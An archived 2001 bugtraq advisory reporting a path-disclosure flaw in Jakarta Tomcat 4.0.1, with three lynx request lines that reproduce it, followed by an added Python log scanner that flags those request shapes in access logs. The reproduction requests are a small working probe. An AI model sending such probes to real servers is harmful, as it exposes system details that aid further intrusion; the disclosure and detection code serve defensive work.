[23230] in bugtraq


Hi

daemon@ATHENA.MIT.EDU (analysist)
Fri Nov 23 17:38:01 2001

Message-Id: <200111220923.fAM9Mxu28837@www.nsfocus.com>
Date: Thu, 22 Nov 2001 17:32:20 +0800
From: analysist <analysist@nsfocus.com>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain;
      charset="GB2312"
Content-Transfer-Encoding: 8bit

Hello,

It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submitting an unusually long request (more than 222 bytes) or a specially crafted request, we can
get the web server's install path.

How to produce it
----------------------
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp

Tested version 
-----------------------   
Jakarta Tomcat v4.0.1
    Microsoft Windows 2000

I sent this information to the vendor a week ago, but I have not received any reply! :(

Best Regards

analysist@nsfocus.com 
NSFOCUS Security Team <http://www.nsfocus.com>
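
A log check for the three request shapes listed in the post, as an added example that is not part of the original message. It assumes Common Log Format access logs, applies the post's 222-byte figure to the decoded request path, and assumes the requests of interest end in .jsp as all three in the post do; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Request field of a Common Log Format line: "METHOD URI HTTP/x.y"
REQ_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/\d\.\d"')
# 222 is the figure from the post; applying it to the decoded path is an assumption.
MAX_PATH_BYTES = 222

def classify(uri):
    """Return which of the post's three request shapes this URI matches."""
    # Drop the query string, then decode %xx so encoded variants match as well.
    path = unquote_to_bytes(uri.split("?", 1)[0])
    if not path.lower().endswith(b".jsp"):  # assumption: all three cases end in .jsp
        return []
    dirs = path.split(b"/")[:-1]  # directory segments, file name excluded
    hits = []
    if len(path) > MAX_PATH_BYTES:
        hits.append("long-jsp-path")
    if b":" in dirs:
        hits.append("colon-segment")
    if b"~.." in dirs:
        hits.append("tilde-dotdot-segment")
    return hits

def scan(lines):
    """Return (line_number, hits) for each log line whose request matches."""
    found = []
    for number, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        hits = classify(match.group("uri")) if match else []
        if hits:
            found.append((number, hits))
    return found

# Constructed sample log lines (not taken from a real server).
STAMP = '127.0.0.1 - - [22/Nov/2001:17:30:00 +0800] '
SAMPLE_LOG = [
    STAMP + '"GET /index.jsp HTTP/1.0" 200 512',
    STAMP + '"GET /' + "A" * 223 + '.jsp HTTP/1.0" 500 2048',
    STAMP + '"GET /:/x.jsp HTTP/1.0" 500 2048',
    STAMP + '"GET /%7E../x.jsp HTTP/1.0" 500 2048',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```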

